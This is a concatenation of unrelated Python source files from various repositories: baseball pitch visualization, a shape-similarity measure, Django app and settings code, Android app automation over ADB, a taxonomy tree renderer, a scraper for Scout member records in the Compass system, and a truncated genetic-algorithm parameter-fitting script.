replace_dict = {"description": {"hit_into_play_no_out": "contact", "hit_into_play": "contact", "hit_into_play_score": "contact", "swinging_strike": "miss", "swinging_strike_blocked": "miss"}}
ballname_dict = {"FF": "4-Seam Fastball", "CH": "Changeup", "CU": "Curveball", "SL": "Slider", "FT": "2-Seam Fastball", "AB": "Automatic Ball",
"AS": "Automatic Strike", "EP": "Eephus", "FC": "Cutter", "FO": "Forkball", "FS": "Splitter", "GY": "Gyroball", "IN": "Intentional Ball",
"KC": "Knuckle Curve", "NP": "No Pitch", "PO": "Pitchout", "SC": "Screwball", "SI": "Sinker", "UN": "Unknown"}
df = df.replace(replace_dict)
df = df[df["description"].isin(["contact", "miss"])]
for i in df["pitch_type"].unique():
visualize(df, i)
| 3.375 | 3 |
shape_similarity.py | Toonwire/infancy_eye_tracking | 0 | 6872 | # -*- coding: utf-8 -*-
"""
Created on Sat May 25 13:17:49 2019
@author: Toonw
"""
import numpy as np
def vlen(a):
return (a[0]**2 + a[1]**2)**0.5
def add(v1,v2):
return (v1[0]+v2[0], v1[1]+v2[1])
def sub(v1,v2):
return (v1[0]-v2[0], v1[1]-v2[1])
def unit_vector(v):
vu = v / np.linalg.norm(v)
return (vu[0], vu[1])
def angle_between(v1, v2):
angle = np.arccos(np.dot(v1,v2)/(vlen(v1)*vlen(v2)))
return angle
# Similarity measure of article
## https://pdfs.semanticscholar.org/60b5/aca20ba34d424f4236359bd5e6aa30487682.pdf
def sim_measure(A, B): # similarity between two shapes A and B
# print(A)
# print(B)
return 1 - (sum([(vlen(unit_vector(a))+vlen(unit_vector(b)))*angle_between(a,b) for a,b in zip(A,B)]))/(np.pi*(len(A)+len(B))) | 2.859375 | 3 |
apps/chats/apps.py | aldwyn/effigia | 1 | 6873 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class ChatsConfig(AppConfig):
name = 'apps.chats'
def ready(self):
from actstream import registry
registry.register(*self.get_models())
| 1.734375 | 2 |
utils/ghost.py | JayJJChen/LoveXueXiQiangGuo | 3 | 6874 | <gh_stars>1-10
import os
import time
from utils.eye import Eye
from utils.finger import Finger
class Ghost:
"""class to navigate the app, with Eye and Finger"""
def __init__(self, adb_path, temp_path, sleep_sec=2):
self.eye = Eye(adb_path, temp_path)
self.finger = Finger(adb_path, sleep_sec=sleep_sec)
def to_main(self):
"""back to main page, doesn't support back from exam"""
num_attempts = 0
max_try = 10
while not self._in_main():
if self._in_exam():
self._exit_exam()
else:
self.finger.back()
num_attempts += 1
if num_attempts >= max_try: # failsafe
input("I'm lost! Please help me go to main page! Hit Enter to continue")
def to_score(self):
"""click the score from main page"""
self._bottom_tab(2)
self._goto("score")
def to_exam_root(self):
"""go to the exam page root from main page"""
self._bottom_tab(4)
self._goto("exam_icon")
def _exit_exam(self):
"""exit during exam to main"""
self.finger.back()
self._goto("exit_exam")
self.finger.back()
def swipe_up(self):
self.finger.swipe(500, 1000, 500, 500)
def swipe_down(self):
self.finger.swipe(500, 500, 500, 1000)
def _find_weekly_exam(self):
"""find available weekly exam in weekly exam page"""
path = self._image_path("start_exam")
coords = self.eye.find(path, multi_target=False)
fail_count = 0
while coords is None:
# swipe up if there's no "start_exam"
time.sleep(2)
self.swipe_up()
coords = self.eye.find(path, multi_target=False)
if (fail_count > 10) and (coords is None):
raise RuntimeError("I'm lost! Exiting!")
self.finger.tap(*coords[0])
def _goto(self, img_name):
path = self._image_path(img_name)
coords = self.eye.find(path, multi_target=False)
fail_count = 0
while coords is None:
time.sleep(2)
coords = self.eye.find(path, multi_target=False)
if (fail_count > 5) and (coords is None):
raise RuntimeError("I'm lost! Exiting!")
self.finger.tap(*coords[0])
def _bottom_tab(self, n):
"""
navigate to bottom n_th tab, the screen resolution is 1080x1920
args
n: int, n_th bottom tab
{
n=0: 消息
n=1: 关注
n=2: 学刁
n=3: 视频学习
n=4: 我的
}
"""
x = [108 + 108 * 2 * i for i in range(5)]
y = 1850
self.finger.tap(x[n], y)
def _in_exam(self):
image = self.eye.see()
in_exam = self.eye.find(self._image_path("in_exam"), img=image, multi_target=False)
if in_exam is not None:
return True
else:
return False
def _in_main(self):
image = self.eye.see()
main_act = self.eye.find(self._image_path("main_act"), img=image, multi_target=False)
main_inact = self.eye.find(self._image_path("main_inact"), img=image, multi_target=False)
if (main_act is not None) or (main_inact is not None):
return True
else:
return False
@staticmethod
def _image_path(img_name):
path = os.path.join("images", "{}.png".format(img_name))
return path
| 2.984375 | 3 |
src_taxonomy/bubble_tree_map.py | sanja7s/SR_Twitter | 0 | 6875 | <filename>src_taxonomy/bubble_tree_map.py
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import random
from ete2 import Tree, TreeStyle, NodeStyle, faces, AttrFace, CircleFace, TextFace
def layout(node):
if not node.is_root():
# Add node name to laef nodes
#N = AttrFace("name", fsize=14, fgcolor="black")
#faces.add_face_to_node(N, node, 0)
#pass
faces.add_face_to_node(TextFace(node.name), node, 0)
if "weight" in node.features:
# Creates a sphere face whose size is proportional to node's
# feature "weight"
C = CircleFace(radius=node.weight, color="RoyalBlue", style="sphere")
# Let's make the sphere transparent
C.opacity = 0.3
# And place as a float face over the tree
faces.add_face_to_node(C, node, 0, position="float")
def give_tree_layout(t):
# Some random features in all nodes
for n in t.traverse():
n.add_features(weight=n.dist*20)
# Create an empty TreeStyle
ts = TreeStyle()
# Set our custom layout function
ts.layout_fn = layout
# Draw a tree
#ts.mode = "c"
#ts.arc_start = -180
#ts.arc_span = 180
# We will add node names manually
#ts.show_leaf_name = True
# Show branch data
#ts.show_branch_length = True
#ts.show_branch_support = True
return ts
class Tree7s(object):
def __init__(self, lab):
self.root = Node7s(lab, 0, 0)
def find_root(self):
return self.root
class Node7s(object):
def __init__(self, data, score, lev):
self.data = data
self.score = score
self.level = lev
self.children = []
def add_child(self, lab, score, lev):
if int(self.level) == int(lev-1):
nn = self.find_child(lab)
if nn == None:
self.children.append(Node7s(lab, score, lev))
else:
nn.increase_score(score)
else:
print "Trying to add to a wrong level?", lev-1, self.level, lab, self.data
def find_child(self, label):
for el in self.children:
if el.data == label:
return el
return None
def increase_score(self, sc):
self.score += sc
def print_me(self):
print self.data, self.score
for el in self.children:
el.print_me()
def create_newick(self):
if self.children == []:
return str(self.data + ":" + str(self.score))
newick = "("
for el in self.children:
newick += el.create_newick() + ","
newick = newick[:-1]
if self.level == 0:
newick += ")" + str(self.data) + "."
else:
newick += ")" + str(self.data) + ":" + str(self.score)
return newick
def test_data():
D = {'taxonomy': [{"score": "0.718868", "label": "/art and entertainment/movies and tv/movies"},\
{"confident": "no", "score": "0.304296", "label": "/pets/cats"},\
{"score": "0.718868", "label": "/art and entertainment/movies and tv/series"}]}
t7s = Tree7s("ThingAdamsFamily")
for el in D["taxonomy"]:
#n = t7s
n = t7s.find_root()
taxonomy_tree = el["label"]
taxonomy_tree = taxonomy_tree.split("/")
taxonomy_tree.pop(0)
levels = len(taxonomy_tree)
score = float(el["score"])
print levels, taxonomy_tree, score
for i in range(levels):
label = taxonomy_tree[i]
#if n.find_child(label) == None:
n.add_child(label, score, i+1)
n = n.find_child(label)
t7s.find_root().print_me()
t = t7s.find_root()
S = t.create_newick() + ";"
print S
#S = "(((A,B,(C.,D)E)F,(S,N)K)R);"
#T = Tree(S, format=8)
T = Tree(S, format=1)
for node in T.traverse("postorder"):
# Do some analysis on node
print node.name
for node in T.traverse("levelorder"):
# Do some analysis on node
print node.name
#for branch in T
return T
if __name__ == "__main__":
#t.render("bubble_map.png", w=600, dpi=300, tree_style=ts)
#t.show(tree_style=ts)
t = test_data()
ts = give_tree_layout(t)
t.show(tree_style=ts)
t.render("bubble_map.png", w=600, dpi=300, tree_style=ts) | 3.421875 | 3 |
compass/core/_scrapers/member.py | MrNoScript/compass-interface-core | 0 | 6876 | <reponame>MrNoScript/compass-interface-core
from __future__ import annotations
import re
import time
from typing import get_args, Literal, TYPE_CHECKING, Union
from lxml import html
from compass.core.interface_base import InterfaceBase
from compass.core.logger import logger
from compass.core.schemas import member as schema
from compass.core.settings import Settings
from compass.core.utility import cast
from compass.core.utility import maybe_int
from compass.core.utility import parse
if TYPE_CHECKING:
import requests
MEMBER_PROFILE_TAB_TYPES = Literal[
"Personal", "Roles", "Permits", "Training", "Awards", "Emergency", "Comms", "Visibility", "Disclosures"
]
class PeopleScraper(InterfaceBase):
"""Class directly interfaces with Compass operations to extract member data.
Compass's MemberProfile.aspx has 13 tabs:
1. Personal Details (No Key)
2. Your Children (Page=CHILD)
3. Roles (Page=ROLES)
4. Permits (Page=PERMITS)
5. Training (Page=TRAINING)
6. Awards (Page=AWARDS)
7. Youth Badges/Awards (Page=BADGES)
8. Event Invitations (Page=EVENTS)
9. Emergency Details (Page=EMERGENCY)
10. Communications (Page=COMMS)
11. Visibility (Page=VISIBILITY)
12. Disclosures (Page=DISCLOSURES)
13. Parents/Guardians (Page=PARENT)
Of these, tabs 2, 7, 8, 13 are disabled functionality.
Tab 11 (Visibility) is only shown on the members' own profile.
For member-adjdacent operations there are additional endpoints:
- /Popups/Profile/AssignNewRole.aspx
- /Popups/Maint/NewPermit.aspx
- /Popups/Profile/EditProfile.aspx
Currently we only use one of these endpoints (AssignNewRole), as all
other data we need can be found from the MemberProfile tabs.
All functions in the class output native types.
"""
def __init__(self, session: requests.Session, validate: bool = False):
"""Constructor for PeopleScraper.
takes an initialised Session object from Logon
"""
super().__init__(session)
self.validate = validate
def _get_member_profile_tab(self, membership_num: int, profile_tab: MEMBER_PROFILE_TAB_TYPES) -> bytes:
"""Returns data from a given tab in MemberProfile for a given member.
Args:
membership_num: Membership Number to use
profile_tab: Tab requested from Compass
Returns:
A dict with content and encoding, e.g.:
{"content": b"...", "encoding": "utf-8"}
Both keys will always be present.
Raises:
ValueError: The given profile_tab value is illegal
Todo:
Other possible exceptions? i.e. from Requests
"""
profile_tab = profile_tab.upper()
tabs = tuple(tab.upper() for tab in get_args(MEMBER_PROFILE_TAB_TYPES))
url = f"{Settings.base_url}/MemberProfile.aspx?CN={membership_num}"
if profile_tab == "PERSONAL": # Personal tab has no key so is a special case
response = self._get(url)
elif profile_tab in tabs:
url += f"&Page={profile_tab}&TAB"
response = self._get(url)
else:
raise ValueError(f"Specified member profile tab {profile_tab} is invalid. Allowed values are {tabs}")
return response.content
def get_personal_tab(self, membership_num: int) -> Union[schema.MemberDetails, dict]:
"""Returns data from Personal Details tab for a given member.
Args:
membership_num: Membership Number to use
Returns:
A dict mapping keys to the corresponding data from the personal
data tab.
For example:
{'membership_number': ...,
'forenames': '...',
'surname': '...',
'main_phone': '...',
'main_email': '...',
'name': '...',
'known_as': '...',
'join_date': datetime.datetime(...),
'sex': '...',
'birth_date': datetime.datetime(...),
'nationality': '...',
'ethnicity': '...',
'religion': '...',
'occupation': '...',
'address': '...'}
Keys will be present only if valid data could be extracted and
parsed from Compass.
Raises:
PermissionError:
Access to the member is not given by the current authentication
Todo:
Other possible exceptions? i.e. from Requests
"""
response = self._get_member_profile_tab(membership_num, "Personal")
tree = html.fromstring(response)
if tree.forms[0].action == "./ScoutsPortal.aspx?Invalid=AccessCN":
raise PermissionError(f"You do not have permission to the details of {membership_num}")
details = dict()
# ### Extractors
# ## Core:
details["membership_number"] = membership_num
# Name(s)
names = tree.xpath("//title//text()")[0].strip().split(" ")[3:]
details["forenames"] = names[0]
details["surname"] = " ".join(names[1:])
# Main Phone
details["main_phone"] = tree.xpath('string(//*[text()="Phone"]/../../../td[3])')
# Main Email
details["main_email"] = tree.xpath('string(//*[text()="Email"]/../../../td[3])')
# ## Core - Positional:
# Full Name
details["name"] = tree.xpath("string(//*[@id='divProfile0']//tr[1]/td[2]/label)")
# Known As
details["known_as"] = tree.xpath("string(//*[@id='divProfile0']//tr[2]/td[2]/label)")
# Join Date # TODO Unknown - take date from earliest role?
join_date_str = tree.xpath("string(//*[@id='divProfile0']//tr[4]/td[2]/label)")
details["join_date"] = parse(join_date_str) if join_date_str != "Unknown" else None
# ## Position Varies, only if authorised:
# Gender
details["sex"] = tree.xpath("string(//*[@id='divProfile0']//*[text()='Gender:']/../../td[2])")
# DOB
details["birth_date"] = parse(tree.xpath("string(//*[@id='divProfile0']//*[text()='Date of Birth:']/../../td[2])"))
# Nationality
details["nationality"] = tree.xpath("string(//*[@id='divProfile0']//*[text()='Nationality:']/../../td[2])")
# Ethnicity
details["ethnicity"] = tree.xpath("normalize-space(//*[@id='divProfile0']//*[text()='Ethnicity:']/../../td[2])")
# Religion
details["religion"] = tree.xpath("normalize-space(//*[@id='divProfile0']//*[text()='Religion/Faith:']/../../td[2])")
# Occupation
details["occupation"] = tree.xpath("normalize-space(//*[@id='divProfile0']//*[text()='Occupation:']/../../td[2])")
# Address
details["address"] = tree.xpath('string(//*[text()="Address"]/../../../td[3])')
# Filter out keys with no value.
details = {k: v for k, v in details.items() if v}
if self.validate:
return schema.MemberDetails.parse_obj(details)
else:
return details
def get_roles_tab(self, membership_num: int, keep_non_volunteer_roles: bool = False) -> Union[schema.MemberRolesDict, dict]:
"""Returns data from Roles tab for a given member.
Sanitises the data to a common format, and removes Occasional Helper, Network, and PVG roles by default.
Args:
membership_num: Membership Number to use
keep_non_volunteer_roles: Keep Helper (OH/PVG) & Network roles?
Returns:
A dict of dicts mapping keys to the corresponding data from the roles tab.
E.g.:
{1234578:
{'role_number': 1234578,
'membership_number': ...,
'role_title': '...',
'role_class': '...',
'role_type': '...',
'location_id': ...,
'location_name': '...',
'role_start_date': datetime.datetime(...),
'role_end': datetime.datetime(...),
'role_status': '...'},
{...}
}
Keys will always be present.
Raises:
PermissionError:
Access to the member is not given by the current authentication
Todo:
Other possible exceptions? i.e. from Requests
primary_role
"""
logger.debug(f"getting roles tab for member number: {membership_num}")
response = self._get_member_profile_tab(membership_num, "Roles")
tree = html.fromstring(response)
if tree.forms[0].action == "./ScoutsPortal.aspx?Invalid=AccessCN":
raise PermissionError(f"You do not have permission to the details of {membership_num}")
roles_data = {}
rows = tree.xpath("//tbody/tr")
for row in rows:
# Get children (cells in row)
cells = list(row) # filter out empty elements
# If current role allows selection of role for editing, remove tickbox
if any(el.tag == "input" for el in cells[0]):
cells.pop(0)
role_number = int(row.get("data-pk"))
status_with_review = cells[5].text_content().strip()
if status_with_review.startswith("Full Review Due "):
role_status = "Full"
review_date = parse(status_with_review.removeprefix("Full Review Due "))
else:
role_status = status_with_review
review_date = None
role_details = dict(
role_number=role_number,
membership_number=membership_num,
role_title=cells[0].text_content().strip(),
role_class=cells[1].text_content().strip(),
# role_type only visible if access to System Admin tab
role_type=[*row.xpath("./td[1]/*/@title"), None][0],
# location_id only visible if role is in hierarchy AND location still exists
location_id=cells[2][0].get("data-ng_id"),
location_name=cells[2].text_content().strip(),
role_start=parse(cells[3].text_content().strip()),
role_end=parse(cells[4].text_content().strip()),
role_status=role_status,
review_date=review_date,
can_view_details=any("VIEWROLE" in el.get("class") for el in cells[6]),
)
# Remove OHs etc from list
if not keep_non_volunteer_roles and (
"helper" in role_details["role_class"].lower()
or {role_details["role_title"].lower()} <= {"occasional helper", "pvg", "network member"}
):
continue
roles_data[role_number] = role_details
if self.validate:
return schema.MemberRolesDict.parse_obj(roles_data)
else:
return roles_data
def get_training_tab(
self, membership_num: int, ongoing_only: bool = False
) -> Union[schema.MemberTrainingTab, schema.MemberMOGLList, dict]:
"""Returns data from Training tab for a given member.
Args:
membership_num: Membership Number to use
ongoing_only: Return a dataframe of role training & OGL info? Otherwise returns all data
Returns:
A dict mapping keys to the corresponding data from the training
tab.
E.g.:
{'roles': {1234567: {'role_number': 1234567,
'role_title': '...',
'role_start': datetime.datetime(...),
'role_status': '...',
'location': '...',
'ta_data': '...',
'ta_number': '...',
'ta_name': '...',
'completion': '...',
'wood_badge_number': '...'},
...},
'plps': {1234567: [{'pk': 6142511,
'module_id': ...,
'code': '...',
'name': '...',
'learning_required': False,
'learning_method': '...',
'learning_completed': '...',
'validated_membership_number': '...',
'validated_name': '...'},
...],
...},
'mandatory': {'GDPR':
{'name': 'GDPR',
'completed_date': datetime.datetime(...)},
...}}
Keys will always be present.
Todo:
Other possible exceptions? i.e. from Requests
"""
# pylint: disable=too-many-locals,too-many-statements
response = self._get_member_profile_tab(membership_num, "Training")
tree = html.fromstring(response)
rows = tree.xpath("//table[@id='tbl_p5_TrainModules']/tr")
training_plps = {}
training_roles = {}
for row in rows:
# Personal Learning Plan (PLP) data
if "trPLP" in row.classes:
plp = row
plp_table = plp.getchildren()[0].getchildren()[0]
plp_data = []
for module_row in plp_table:
if module_row.get("class") != "msTR trMTMN":
continue
module_data = {}
child_nodes = list(module_row)
module_data["pk"] = int(module_row.get("data-pk"))
module_data["module_id"] = int(child_nodes[0].get("id")[4:])
matches = re.match(r"^([A-Z0-9]+) - (.+)$", child_nodes[0].text_content()).groups()
if matches:
module_data["code"] = str(matches[0])
module_data["name"] = matches[1]
# Skip processing if we only want ongoing learning data and the module is not GDPR.
if ongoing_only and "gdpr" not in module_data["code"].lower():
continue
learning_required = child_nodes[1].text_content().lower()
module_data["learning_required"] = "yes" in learning_required if learning_required else None
module_data["learning_method"] = child_nodes[2].text_content() or None
module_data["learning_completed"] = parse(child_nodes[3].text_content())
module_data["learning_date"] = parse(child_nodes[3].text_content())
validated_by_string = child_nodes[4].text_content()
if validated_by_string:
# Add empty item to prevent IndexError
validated_by_data = validated_by_string.split(" ", maxsplit=1) + [""]
module_data["validated_membership_number"] = maybe_int(validated_by_data[0])
module_data["validated_name"] = validated_by_data[1]
module_data["validated_date"] = parse(child_nodes[5].text_content())
plp_data.append(module_data)
training_plps[int(plp_table.get("data-pk"))] = plp_data
# Role data
if "msTR" in row.classes:
role = row
child_nodes = list(role)
info = {} # NoQA
info["role_number"] = int(role.xpath("./@data-ng_mrn")[0])
info["role_title"] = child_nodes[0].text_content()
info["role_start"] = parse(child_nodes[1].text_content())
status_with_review = child_nodes[2].text_content()
if status_with_review.startswith("Full (Review Due: "):
info["role_status"] = "Full"
info["review_date"] = parse(status_with_review.removeprefix("Full (Review Due: ").removesuffix(")"))
else:
info["role_status"] = status_with_review
info["review_date"] = None
info["location"] = child_nodes[3].text_content()
training_advisor_string = child_nodes[4].text_content()
if training_advisor_string:
info["ta_data"] = training_advisor_string
# Add empty item to prevent IndexError
training_advisor_data = training_advisor_string.split(" ", maxsplit=1) + [""]
info["ta_number"] = maybe_int(training_advisor_data[0])
info["ta_name"] = training_advisor_data[1]
completion_string = child_nodes[5].text_content()
if completion_string:
info["completion"] = completion_string
parts = completion_string.split(":")
info["completion_type"] = parts[0].strip()
info["completion_date"] = parse(parts[1].strip())
assert len(parts) <= 2, parts[2:]
# info["ct"] = parts[3:] # TODO what is this? From CompassRead.php
info["wood_badge_number"] = child_nodes[5].get("id", "").removeprefix("WB_") or None
training_roles[info["role_number"]] = info
# Handle GDPR:
# Get latest GDPR date
training_ogl = {
"GDPR": dict(
name="GDPR",
completed_date=next(
reversed(
sorted(mod["validated_date"] for plp in training_plps.values() for mod in plp if mod["code"] == "GDPR")
),
None,
),
),
}
for ongoing_learning in tree.xpath("//tr[@data-ng_code]"):
cell_text = {c.get("id", "<None>").split("_")[0]: c.text_content() for c in ongoing_learning}
training_ogl[ongoing_learning.get("data-ng_code")] = dict(
name=cell_text.get("<None>"),
completed_date=parse(cell_text.get("tdLastComplete")),
renewal_date=parse(cell_text.get("tdRenewal")),
)
# TODO missing data-pk from list(cell)[0].tag == "input", and module names/codes. Are these important?
if ongoing_only:
return schema.MemberMOGLList.parse_obj(training_ogl) if self.validate else training_ogl
training_data = {
"roles": training_roles,
"plps": training_plps,
"mandatory": training_ogl,
}
return schema.MemberTrainingTab.parse_obj(training_data) if self.validate else training_data
def get_permits_tab(self, membership_num: int) -> Union[schema.MemberPermitsList, list]:
"""Returns data from Permits tab for a given member.
If a permit has been revoked, the expires value is None and the status is PERM_REV
Args:
membership_num: Membership Number to use
Returns:
A list of dicts mapping keys to the corresponding data from the
permits tab.
Keys will always be present.
Todo:
Other possible exceptions? i.e. from Requests
"""
response = self._get_member_profile_tab(membership_num, "Permits")
tree = html.fromstring(response)
# Get rows with permit content
rows = tree.xpath('//table[@id="tbl_p4_permits"]//tr[@class="msTR msTRPERM"]')
permits = []
for row in rows:
permit = dict(membership_number=membership_num)
child_nodes = list(row)
permit["permit_type"] = child_nodes[1].text_content()
permit["category"] = child_nodes[2].text_content()
permit["type"] = child_nodes[3].text_content()
permit["restrictions"] = child_nodes[4].text_content()
expires = child_nodes[5].text_content()
permit["expires"] = parse(expires) if expires != "Revoked" else None
permit["status"] = child_nodes[5].get("class")
permits.append(permit)
if self.validate:
return schema.MemberPermitsList.parse_obj(permits)
else:
return permits
# See getAppointment in PGS\Needle
def get_roles_detail(
self, role_number: int, response: Union[str, requests.Response] = None
) -> Union[schema.MemberRolePopup, dict]:
"""Returns detailed data from a given role number.
Args:
role_number: Role Number to use
response: Pre-generated response to use
Returns:
A dicts mapping keys to the corresponding data from the
role detail data.
E.g.:
{'hierarchy': {'organisation': 'The Scout Association',
'country': '...',
'region': '...',
'county': '...',
'district': '...',
'group': '...',
'section': '...'},
'details': {'role_number': ...,
'organisation_level': '...',
'birth_date': datetime.datetime(...),
'membership_number': ...,
'name': '...',
'role_title': '...',
'role_start': datetime.datetime(...),
'role_status': '...',
'line_manager_number': ...,
'line_manager': '...',
'ce_check': datetime.datetime(...),
'disclosure_check': '...',
'references': '...',
'appointment_panel_approval': '...',
'commissioner_approval': '...',
'committee_approval': '...'},
'getting_started': {...: {'name': '...',
'validated': datetime.datetime(...),
'validated_by': '...'},
...
}}
Keys will always be present.
Todo:
Other possible exceptions? i.e. from Requests
"""
# pylint: disable=too-many-locals,too-many-statements
renamed_levels = {
"County / Area / Scottish Region / Overseas Branch": "County",
}
renamed_modules = {
1: "module_01",
"TRST": "trustee_intro",
2: "module_02",
3: "module_03",
4: "module_04",
"GDPR": "GDPR",
}
unset_vals = {"--- Not Selected ---", "--- No Items Available ---", "--- No Line Manager ---"}
module_names = {
"Essential Information": "M01",
"Trustee Introduction": "TRST",
"PersonalLearningPlan": "M02",
"Tools for the Role (Section Leaders)": "M03",
"Tools for the Role (Managers and Supporters)": "M04",
"General Data Protection Regulations": "GDPR",
}
references_codes = {
"NC": "Not Complete",
"NR": "Not Required",
"RR": "References Requested",
"S": "References Satisfactory",
"U": "References Unsatisfactory",
}
start_time = time.time()
if response is None:
response = self._get(f"{Settings.base_url}/Popups/Profile/AssignNewRole.aspx?VIEW={role_number}")
logger.debug(f"Getting details for role number: {role_number}. Request in {(time.time() - start_time):.2f}s")
post_response_time = time.time()
if isinstance(response, (str, bytes)):
tree = html.fromstring(response)
else:
tree = html.fromstring(response.content)
form = tree.forms[0]
if form.action == "./ScoutsPortal.aspx?Invalid=Access":
raise PermissionError(f"You do not have permission to the details of role {role_number}")
member_string = form.fields.get("ctl00$workarea$txt_p1_membername")
ref_code = form.fields.get("ctl00$workarea$cbo_p2_referee_status")
role_details = dict()
# Approval and Role details
role_details["role_number"] = role_number
role_details["organisation_level"] = form.fields.get("ctl00$workarea$cbo_p1_level")
role_details["birth_date"] = parse(form.inputs["ctl00$workarea$txt_p1_membername"].get("data-dob"))
role_details["membership_number"] = int(form.fields.get("ctl00$workarea$txt_p1_memberno"))
role_details["name"] = member_string.split(" ", maxsplit=1)[1] # TODO does this make sense - should name be in every role??
role_details["role_title"] = form.fields.get("ctl00$workarea$txt_p1_alt_title")
role_details["role_start"] = parse(form.fields.get("ctl00$workarea$txt_p1_startdate"))
# Role Status
role_details["role_status"] = form.fields.get("ctl00$workarea$txt_p2_status")
# Line Manager
line_manager_el = next((op for op in form.inputs["ctl00$workarea$cbo_p2_linemaneger"] if op.get("selected")), None)
role_details["line_manager_number"] = maybe_int(line_manager_el.get("value")) if line_manager_el is not None else None
role_details["line_manager"] = line_manager_el.text.strip() if line_manager_el is not None else None
# Review Date
role_details["review_date"] = parse(form.fields.get("ctl00$workarea$txt_p2_review"))
# CE (Confidential Enquiry) Check # TODO if CE check date != current date then is valid
role_details["ce_check"] = parse(form.fields.get("ctl00$workarea$txt_p2_cecheck"))
# Disclosure Check
disclosure_with_date = form.fields.get("ctl00$workarea$txt_p2_disclosure")
if disclosure_with_date.startswith("Disclosure Issued : "):
disclosure_date = parse(disclosure_with_date.removeprefix("Disclosure Issued : "))
disclosure_check = "Disclosure Issued"
else:
disclosure_date = None
disclosure_check = disclosure_with_date
role_details["disclosure_check"] = disclosure_check # TODO extract date
role_details["disclosure_date"] = disclosure_date # TODO extract date
# References
role_details["references"] = references_codes.get(ref_code, ref_code)
approval_values = {}
for row in tree.xpath("//tr[@class='trProp']"):
select = row[1][0]
code = select.get("data-app_code")
approval_values[code] = select.get("data-db")
# select.get("title") gives title text, but this is not useful as it does not reflect latest changes,
# but only who added the role to Compass.
# Appointment Panel Approval
role_details["appointment_panel_approval"] = approval_values.get("ROLPRP|AACA")
# Commissioner Approval
role_details["commissioner_approval"] = approval_values.get("ROLPRP|CAPR")
# Committee Approval
role_details["committee_approval"] = approval_values.get("ROLPRP|CCA")
if role_details["line_manager_number"] in unset_vals:
role_details["line_manager_number"] = None
# Filter null values
role_details = {k: v for k, v in role_details.items() if v is not None}
# Getting Started
modules_output = {}
getting_started_modules = tree.xpath("//tr[@class='trTrain trTrainData']")
# Get all training modules and then extract the required modules to a dictionary
for module in getting_started_modules:
module_name = module[0][0].text.strip()
if module_name in module_names:
info = {
# "name": module_names[module_name], # short_name
"validated": parse(module[2][0].value), # Save module validation date
"validated_by": module[1][1].value or None, # Save who validated the module
}
mod_code = cast(module[2][0].get("data-ng_value")) # int or str
modules_output[renamed_modules[mod_code]] = info
# Get all levels of the org hierarchy and select those that will have information:
# Get all inputs with location data
org_levels = [v for k, v in sorted(dict(form.inputs).items()) if "ctl00$workarea$cbo_p1_location" in k]
# TODO
all_locations = {row.get("title"): row.findtext("./option") for row in org_levels}
clipped_locations = {
renamed_levels.get(key, key).lower(): value for key, value in all_locations.items() if value not in unset_vals
}
logger.debug(
f"Processed details for role number: {role_number}. "
f"Compass: {(post_response_time - start_time):.3f}s; Processing: {(time.time() - post_response_time):.4f}s"
)
# TODO data-ng_id?, data-rtrn_id?
full_details = {
"hierarchy": clipped_locations,
"details": role_details,
"getting_started": modules_output,
}
if self.validate:
return schema.MemberRolePopup.parse_obj(full_details)
else:
return full_details
| 1.960938 | 2 |
quran_text/urls.py | Quran-Tafseer/tafseer_api | 16 | 6877 | <filename>quran_text/urls.py
from django.urls import path
from . import views
urlpatterns = [
path('',
view=views.SuraListView.as_view(), name='sura-list'),
path('<int:sura_num>/<int:number>/',
view=views.AyahTextView.as_view(), name='ayah-detail'),
path('<int:sura_num>/<int:number>',
view=views.AyahTextView.as_view()),
]
| 1.882813 | 2 |
konnection/settings/local.py | IanSeng/CMPUT404_PROJECT | 0 | 6878 | <filename>konnection/settings/local.py
from konnection.settings.base import *
from pathlib import Path
import os
import dotenv
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent.parent
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
SECRET_KEY = 'temporaryKey'
# For tests
# https://stackoverflow.com/a/35224204
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
NOSE_ARGS = ['--with-spec', '--spec-color']
# Adding secrets to env file
# From StackOverflow https://stackoverflow.com/a/61437799
# From <NAME> https://stackoverflow.com/users/10415970/zack-plauch%c3%a9
dotenv_file = os.path.join(BASE_DIR, ".env")
if os.path.isfile(dotenv_file):
dotenv.load_dotenv(dotenv_file)
# Connecting PostgreSQL to Django
# From https://www.digitalocean.com/community/tutorials/how-to-use-postgresql-with-your-django-application-on-ubuntu-14-04
# From Digital Ocean
# From <NAME> https://www.digitalocean.com/community/users/jellingwood
if os.getenv('GITHUB_WORKFLOW'):
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'github-actions',
'USER': 'postgres',
'PASSWORD': 'postgres',
'HOST': 'localhost',
'PORT': '5432'
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'myproject',
'USER': os.environ['DB_USER'],
'PASSWORD': os.environ['DB_PASSWORD'],
'HOST': 'localhost',
'PORT': '',
}
} | 1.921875 | 2 |
main.py | PotentialParadox/PyReparm | 0 | 6879 | <gh_stars>0
import random
from evaluation import Evaluator
from generator import generator
from mutate import mutateset
from deap import base
from deap import creator
from deap import tools
from parameter_group import ParameterGroup
import gaussian_output
from analysis import Analysis
from gaussian_input import GaussianInput
from gaussian import gaussian_single
from header import Header
from reparm_data import ReparmData
from genesis import Genesis
import numpy as np
from scipy.optimize import minimize
from copy import deepcopy
from sklearn.cross_validation import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn import svm
from sklearn.linear_model import RidgeCV
from sklearn.ensemble import RandomForestRegressor
#############################################
# BEGIN USER INPUT
#############################################
fin = open("reparm.in", 'r')
file = fin.read()
reparm_data = ReparmData(file)
if reparm_data.reparm_input.should_continue:
reparm_data.load()
else:
Genesis(reparm_data=reparm_data)
reparm_data.save()
############################################
# END USER INPUT
############################################
#############################################
# BEGIN USER INPUT
#############################################
# Number of Generation
NGEN = reparm_data.reparm_input.number_generations
# PopulationSize
PSIZE = reparm_data.reparm_input.population_size
# Crossover Probability
CXPB = reparm_data.reparm_input.crossover_probability
# Mutation Probability
# How likely and individual will be mutated
MUTPB = reparm_data.reparm_input.mutation_probability
# Mutation Rate
# How likely a member of an individual will be mutated
MUTR = reparm_data.reparm_input.mutation_rate
# Crowding Factor
CWD = reparm_data.reparm_input.crowding_factor
# Mutation Perturbation
